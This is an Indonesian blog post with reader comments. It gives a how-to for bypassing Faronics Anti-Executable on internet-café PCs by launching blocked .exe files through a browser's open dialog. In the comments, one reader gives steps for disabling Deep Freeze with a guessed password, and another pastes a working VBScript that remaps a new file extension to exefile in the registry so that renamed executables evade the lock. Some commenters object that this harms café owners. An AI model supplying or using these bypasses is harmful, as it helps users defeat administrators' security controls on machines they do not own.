Mengakali/Bypass Faronics Anti Executable

11 April 2009 pukul 9:43 | Ditulis dalam tekno | 88 Komentar
Tag: , , , ,

**INI ADALAH PENGALAMAN PRIBADI (dan sudah jadul sekali) SEHINGGA SAYA TIDAK MENJAMIN JIKA PROGRAM ATAU TUTORIAL INI BISA BERJALAN SEMPURNA… SELAMAT MENCOBA**

**KOMENTAR YANG TIDAK SOPAN AKAN DIHAPUS***

Kalau Anda sering ke warnet, dan mencoba membuka file exe milik Anda, kadang Anda harus menyerah karena diblok oleh aplikasi yang bernama Faronics Anti Executable. Di komputer yang telah terinstal, pada bagian taskbar dapat dijumpai logo seperti ini: logo

Aplikasi ini berfungsi untuk membatasi akses ke file executable yang tidak diizinkan oleh admin atau yang menguasai komputer. Aku salin dari situsnya: Block Distractive Software From Running; Stop Malicious Software From Installing; Keep Systems Free Of Unlicensed Software.

Jika Anda mencoba menginstal aplikasi bawaan Anda semisal Internet Download Manager atau Flashget (dan bermacam-macam software egois lainnya :D), maka otomatis akan diblok, dan muncul pop-up “This action violates the acceptable use policy” seperti ini:

Pop-up Faronics

Pop-up Faronics

Setelah sedikit bereksperimen, aku menemukan cara untuk melewati blokade faronics anti executable. Caranya sangat mudah dan sederhana. Ikuti langkah-langkah berikut ini:

1. Pastikan di komputer yang Anda pakai terinstal browser, semisal Firefox, Opera, atau IE. Kalau yang ini tidak perlu dipikirkan. Sudah pasti ada kok. Haha. Untuk kali ini, aku pakai Mozilla Firefox.

2. Saatnya beraksi. Tekan Ctrl+O. Lalu pada bagian Files of type, pilih all files. Nah, lalu pilih file .exe yang ingin Anda jalankan.

3. Maka akan muncul jendela download manager. File ini akan bertanda local files. Setelah selesai didownload, lalu klik kanan -> open.

open4. Setelah itu akan muncul konfirmasi untuk membuka file. Pilih saja OK. Maka proses instalasi pun akan dimulai. Terserah mau instal di mana. Boleh di C:\ atau di flashdisk Anda.

5. Setelah software terinstal, langkah selanjutnya sama dengan langkah sebelumnya, yaitu dengan menekan Ctrl+O. Pilih file target di mana software itu terinstal. Misalnya di folder C:\Program Files\Flashget\flashget.exe. Kalau kurang jelas, silakan cari dengan mengeklik Find Target… pada application properties di start menu. far21Setelah itu, klik OK. Maka software Anda siap digunakan. yahoo

© alifahmi.wordpress.com

About these ads

88 Komentar »

Umpan RSS untuk komentar-komentar pada pos ini. TrackBack URI

  1. maaf mas, saya coba berulang kali ko tidak bisa ya

  2. buka software apa mas? mungkin beberapa file exe emang gak bisa pake cara ini. contohnya aja pas aku mau uninstal flashget,
    gak bisa buka unwise.exe.
    yah, mungkin memang anda belum beruntung..hehe.
    coba pakai software lain yg sejenis

  3. kagak bisa berhasil. saya sudah mencobanya :( apa ada cara lain lagi ya :D

    • iya nich kok kagak berhasih

  4. men i love u.. u r such a genius..keep up the the good hacking work bro.. one love pls mail m back and lets share ideas ok?

  5. ngapusiiii, ra iso ki ndul

  6. iya tu boss, aku nyoba ga bisa… tapi aku dah cari2 cara nich. aku posting di http://www.madeinjogja.blogspot.com

    coba cari aja disana/ di search : anti exacutable / ada di tag offline security

  7. bisa woy

  8. jangan cuma copy paste kalau posting…
    sebaiknya anda coba dulu…

    gk ada yang bisa tuh…

    • ini kutulis sendiri bro..
      jangan asal nuduh..
      kalo ada postingan yang sama persis, kujamin itu copas dari sini..
      tunggu saja, nanti akan kubuktikan..
      kalo nyoba gak bisa ya brarti anda kurang beruntung..
      namanya juga cuma pengalaman pribadi :P

  9. sudah bisa….

  10. Horeeee
    Sopwer yg gw buka Akhirnya bisa jg

    Gag tau klo sopwer laen :P

  11. klo Installl secara manual bisa ga Bossss
    maksudnya begini…aku Install anti-executable di Komp…terus aku lupa password…
    gimana cara UnInstall anti executable… tanpa Install ulang n format komputer

  12. semua program pengunci pasti enggak akan bisa lolos klo pake cara gini … uuuuu

  13. kk aq bisa buka file exe tapi koq buka buwat yg nginstall gitu koq gk bisa y?

  14. bos gw gak nuduh,cuman gw pernah baca artikel kek gini di bulan july 2009 tuh artikel punyak sapa yah ?

  15. ga bisa dab…

    coba deh ini : 100% BISA

    http://madeinjogja.blogspot.com/2009/06/mengatasi-keampuhan-anti-executable.html

  16. tetap nggak bisa.. dah coba in neh

  17. sekali lagi saya mohon maaf kalo mau ikut nyoba tapi gak bisa..
    maklum itu cuma pengalaman pribadi.
    silakan kalau mau coba, itu ada teknik lain di http://madeinjogja.blogspot.com/2009/06/mengatasi-keampuhan-anti-executable.html.
    makasih udah mau ngasih komentar,,

  18. silakan kalo mau baca…curahan hati saya :D
    http://alifahmi.wordpress.com/2010/01/05/plagiat/

  19. Ya memang beberapa beberapa file exe bisa namun beberapa juga gk bisa.
    Tapi ni Q punya cara laen, sama pengalaman pribadi juga…. caranya simpan ja file exe kesangan kmu kedalam format ZIP, dijamin didalam sana file exe kesayangan kmu bisa di jalankan. kunjungi juga blog Q ya teman… >>> dha2nk4all.blogspot.com

  20. Ya memang beberapa beberapa file exe bisa namun beberapa juga gk bisa.
    Tapi ni Q punya cara laen, sama pengalaman pribadi juga…. caranya simpan ja file exe kesayangan kmu kedalam format ZIP, dijamin didalam sana file exe kesayangan kmu bisa di jalankan. kunjungi juga blog Q ya teman… >>> dha2nk4all.blogspot.com

    • makasih mas atas tipsnya…
      tapi cara kerjanya juga hampir sama dengan postingan ini,,,
      jadi kadang bisa, kadang nggak..

  21. Sory gue ga ada maksud belain siapa2, buat fahmi kalo post artikel atau tutorial yang masih belum 100% berhasil mendingan ditulis keterangan di postingan anda “INI ADALAH PENGALAMAN PRIBADI DAN SAYA TIDAK MENJAMIN JIKA PROGRAM ATAU TUTORIAL INI BISA BERJALAN SEMPURNA…SELAMAT MENCOBA”. Dan Setahu saya Faronics Anti Executable tidak bisa di TEMBUS, kecuali si pemasang Faronics Anti Executable lalai dalam pengaturan penguncian atau bisa juga Faronics Anti Executable tersebut adalah BAJAKAN !

    • makasih mas buat sarannya… sangat membangun..
      sudah kutambahin di bagian depan postingan :D

  22. boz masih gak bisa tuh

  23. namanya juga anti exe mau diapain juga gak bisa kalau bisa namanya bukan anti exe lagi tapi pro exe :D

  24. mas.. kalau uniinstal nya bagai mana mas…
    aku gk bisa, coz law aku uniinstal dy ada tulisan denied..denied.. apa lh itu mas…

  25. install aja di CD atau Flash disk trus bawa ke warnet…

  26. hai rekan2…

    Mau tau cara nge hack Deep Freeze??

    Caranya Gampang banget… sebelumnya loe download DF yang terbaru.

    yak, langkah 1 : tekan terus tombol SHIFT
    langkah 2 : arahkan mouse di ikon DF komputer loe ato warnet
    langkah 3 : masih terus tekan SHIFT bersamaan mouse klik kiri 2x
    langkah 4 : masukin pasword (biasanya dipake nama warnet) trus OK
    langkah 5 : Loe pilih OFF

    berikutnya loe jalanin tuh DF terbaru dengan pilihan Uninstall

    100% dijamin bisa.

    • dsna klo ngehack kayak gitu ya???
      baru tau saya…
      tu bukan ngehack tapi iseng..

    • ya elah cupu banget, PEDE banget lagi..
      ampun dah gua..
      ckckckckck

      • haha…
        di sana warnet cuma ada satu kali ya ^^

      • belajar lah menghargai pendapat org lain,,,,
        sory…mas ali fahmi kyknya saran kamu untuk membobol anti ExE,,,,,tidak terlalu sempurna…HAck(XxXxXxX)007

      • saya hargai kok. maaf kalo agak menyindir. lucu sih :D
        btw, maaf kalo gak berhasil.. namanya juga coba-coba :P

  27. minta tolong bgt bantuannya nih mas……..
    ku baru instal faronic anti executable enterprise………..
    pada saat login ko g’ bisa masuk Y……..
    pdhl untuk pertama disitu mintax di clik ok aj krn blum ada passx…….
    tpi ko g’ mau masuk Y /???
    dan rencana ku mau uninstal aj…………
    bisa kasi solusinya g’……….???
    tolong bls seceptnya Y mas n blsnya ke email aj…………

    trimakasih atas bantuannya……………

  28. gak semua kali file exe bisa jalan apa yang mas tulisakan diatas, saya sudah coba tetap gak bisa hehehe
    tapi gkpp thanks atas ilmunya

  29. SAYAH HANYA INGIN TAHU APA YANG DI MAKSUD ANTI EXE ITU DAN SAYAH AKAN MENCOBA MENGAKALI NYAH DI SINIH,,,,BY ABENGTHEA,,,,,,,

  30. Saya juga baru menginstall faronics anti-executable, tapi kenapa pada saat login ko gak bisa masuk ya??pdhl untuk pertama disitu mintanya di clik OK aj karena belum ada passwordnya.
    tapi kok gak mau masuk ya???? Petunjuknya sih gini: Ketika jendela confirmasi password terbuka Click tombol “OK” dikarenakan anda belum memasukkan password dan masukkan sebuah password baru jika jendela konfirmasi password muncul.Minta tolong pada rekan-rekan gimana ini penyelesaiannya?????
    Setelah anda sukses Login langkah selanjutnya adalah memberi settingan baru.

  31. Kyanya prinsipny ky kill deepfreze dh, mungkn U bisa coba kill anti-exe dg cra klik disini.

    Trus kt ubah registriny, smoga membantu.

  32. mas…
    hebat..berhasil..
    tpi buat versi yg laennya gag isa,,
    ad cra laen gag,,,
    klo ad tolong kirim k email iia,,
    boongkymahendra@rocketmail.com
    thx

  33. ach mau hack aja binggung semuanya…..t? aja sama ki joko bodo…??
    hehehhe yg jadi masalah kan klau ada anti exenya kan…yach klau ada yg pnya anti exenya tolong donk di bagi2..

  34. manttap .. thanks y ..
    computer ane ad anti exe tp w gk bisa uninstallnya .
    inilah jalan tembusnya :p

    jangan lupa mampir k bloog ane y ^^

  35. waah bisa bro…..
    tapi nggak semua file exe bisa digunain…..

    thanks bro triknya…..

  36. Makasih Gan, , , ,
    Berguna bgt tuh info , , ,
    gw jd bsa instal IDm , , ,

    ^_^

  37. tq infonya hahaha,,
    sangat berguna coz gx prlu bngunin OP lgi tuk bukain execitablenya,,,

  38. ko q ga jalan ya

  39. mas mas semua, usaha anda ngga akan berhasil soalnya sebagian warnet udah saya ajarin menggunakan versi full yang Faronics Anti-Executable 3.50.1111, saya pelajari ternyata anda pakai versi 2.xx. bugnya emang begitu. kalo kalian niat install di warnet sebaiknya nanya jangan asal jebol, makin hari makin maju pasti ada caranya, tapi apa gunanya kalian berbuat begitu, saya tau kalian mematikan antiexe biar bisa mematikan deepfreeze yang udah ada cracknya kan? sehingga anda kesulitan untuk install IDM dan macam macam, ilmu kalian tetep kami update, jadi tolong jangan memberi tutorial yang tidak membangun, beri pelajaran yang berguna buat orang lain tanpa merugikan salah satu pihak.

    • BETUL TUH,,,DASR ORANG INDONESIA,,BISANYA CUMA MERUSAK DOANK,,,JANGAN BANGGA KLO BISA MERUSAK/MENJEBOL,,,ORANG PASANG ANTI EXE,BERARTI “DILARANG”.JD TOLONG JANGN DI LANGGAR

      • untuk wedusesolo dan ikbal,… yang namanya suatu system itu gak bisa ferfect… nah tugas kami disini itu mencari kelemahan nya agar bisa diperbaiki,… misal microsoft : security update xxxffa8768 dkk

        nah itu… cobalah melihat segala sesuatu itu dari sisi lain,… dan anda jangan merasa itu menggangu karna yang namanya hacker atau craker itu memang sudah jalan nya untuk membuka atau membaypass system yang diproteksi agar bisa menjadi lebih baik

        …..
        ….

        ..
        .

      • BODOH!! hacker itu gk ada yg JUJUR ,kecuali saya hacker jujur ,wkwkwkwk ,km itu orang mana ?? orang indonesia juga kan??,nah knapa kmu nghina orng indonesia ,sama aja itu menghina diri mu sendiri

    • saya stuju dengan AK85
      mas wedusesolo
      disini tujannya bukan untuk merugikan orang lain,pi hanya sebatas untuk menambah ilmu dan wawasan ja..
      krn ilmu tu gada batasnya bro..
      sbnarnya ini jg bisa jadi “MASUKAN” untuk si pembuat software twpun sipemilik warnet n teknisinya agar bisa lebih meningkatkan keamanan..
      lw ga kyk gt, iptek ga kan berkembang dan bergerak maju..

      lw cerita merugikan bisa panjang nnt..
      contohnya virus…
      knpa virus ada? biar software anti virus windows laku..
      knpa windows kok ga kyk linux ja??????
      bukan kah virus jg merugikan orang banyak??

      buat ikbal anda termasuk orang2 yg cupu n gaptek, inilah hidup, hadapi kenyataan krna msih banyak haker dan craker d dunia ni, lw mslah gini ja kalian da kelabakan gmn mslah yg lebih parah gi…bner kata AK87, coba lihat segala sesuatu dari sis lain..
      para ilmuwan ga kan bisa menemukan obat jika gada penyakit

  40. thank bro pnya ilmu baru nih,… o_o

  41. pc ku tak instal anti exe, tp menyesal g isa di buang.. jadi g isa nambah game dah..
    tolong bantuannya teman2.

  42. tidak semua file exe yang bisa goblok,..
    review lg tulisan lu…

    • dia kan udah bilang kalau tidak menjamin berhasil.. baca komen2nya juga boss..

  43. pake format factory aja…hilang kok..

  44. coba pake format factory

  45. wah…gak sip…!! ping piro ae mas…ra iso2….ga sip…

  46. ini postingan udah jadul mas.. setahun lebih..
    kalau udah nggak bisa ya maklum :p

    • om mo nnya donk,, klo mose y g bisa d klick knan jd pgn bkin shortcut g bsa2
      trus gmn tuh…??

      • pake smadav om…. di registry nya ceklist yg deep… trus scan dan fix… ilang tuh proteksi

      • trus buaka SMADAVnya gimana??? orang anti exe ini…..

  47. Cobain ah…

  48. kayaknya mantep ijin coba mas :D

  49. BARANG SIAPA YANG BISA MENEMBUS/BYPASS FARONICS ANTI EXE SEKALIGUS DEEP FREEZE, AKAN SAYA BAYAR SESUAI KEAHLIAN ANDA. TERIMA KASIH
    HUBUNGI SAJA LEWAT E-MAIL SAYA : gagas.pambudi@gmail.com

  50. NIH DICOBA, GW lom NYOBA, berasil apa nggak gw juga gak tau, terus terang aja ni hasil copy paste. Gw orang bodo, mau dibilang apapun gw tetep orang bodo, SEMUA HARAP DI NIATI DENGAN BELAJAR, KLO MAU NIAT NGRUSAK SEKALIAN AJA, MASUK KE BILLING TERUS RESTART MANUAL TUH KOMPI 10 X ATO 20 X , STOP BILLING SHUTDOWN KOMPI DG MANUAL PULA. ANCUR TUH KOMPI. LALU APA GUNANYA . . . ? ? ?
    const HKEY_CLASSES_ROOT = &H80000000
    const HKEY_CURRENT_USER = &H80000001
    QUOT = chr(34)
    strComputer = “.”
    On error resume next
    Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
    vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
    If Tanya = 6 Then ‘Bila dipilih YA
    Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonat e}!\” &strComputer & ” ootdefault:StdRegProv”)
    objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
    objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
    objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
    objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
    objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f 2470-bae0-11cd-b579-08002b30bfeb}”
    objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdv anced”
    objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrent VersionExplorerAdvanced”,”HideFileExt”,0
    Set objWMIService = GetObject(”winmgmts:” _
    & “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
    Set colProcessList = objWMIService.ExecQuery _
    (”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
    For Each objProcess in colProcessList
    objProcess.Terminate()
    Next
    set objShell = createobject(”Wscript.Shell”)
    objShell.Run “explorer.exe”
    msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
    End If

    Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs.. jalankan…
    Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable. Ingat jangan disalah gunakan OK!!

  51. BACOT KAU ADMIN ******* !!!!! TOLOL X KW CACAD !!!

  52. wah gak seru ….!!

    bukan nimba ilmu malah yng di dapet comment2 yg kotor .

  53. itu pakai AE versi brp ya…?
    kalau AE versi 3.5 apa bisa…?

  54. waaaa kesasar q…..buat para agan2 yang terhormat ” TETEP BERJUANG MEMBELA NEGARA INDONESIA” hahahahaha gak nyambung blas

  55. rek2 mbok ya dihormati

  56. Info Menarik nich besok tak cobak

  57. thankz ea dha mw share ilmu ……..

    vie,kyaknya cara thu dha gK ampuh lagi gan ?

  58. thankz ea gan dha mw share ilmu…..

    vie,cara thu dha gK ampuh ge gan ?

  59. gk iso mas bro…

  60. mampir gan,
    wis di jajal ra iso kabeh,
    ayo golek cara liyane maneh…. semangat wkwkwkwk…………..

    (karo cincing katok)

  61. Terimakasih share nya mas bro

  62. ******** goblokk

  63. Coba Install ulang windowsnya :D

  64. sepertinya untuk program komputer yang anti executable versi baru sudah ga bisa dijalankan dengan metode ini

  65. selamat … anda beruntung mendapat kan hadiah utama rp. 500.000.000.000 .. silahkan hubungi kami di : 021-75678511

  66. tololllllllllllllllllll

  67. gua juga ga bisa gan..,

    mau buka software game online, kayak Dragon Nest kok tetep gak bisa..,????????

  68. When someone writes an article he/she keeps the thought of a user
    in his/her brain that how a user can know it. So that’s why this piece of writing is outstdanding. Thanks!

  69. bagussss..terus bagi-bagi ilmu gan, anda sangat bermanfaat, komen2 yg g penting abaikan aja.

  70. berbagi ilmu yang merugikan orang orang lain (warnet), semoga anda mendapatkan balasannya. Aamiin..


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Blog pada WordPress.com. | The Pool Theme.
Entries dan komentar feeds.

Ikuti

Get every new post delivered to your Inbox.

Bergabunglah dengan 1.672 pengikut lainnya.

%d bloggers like this: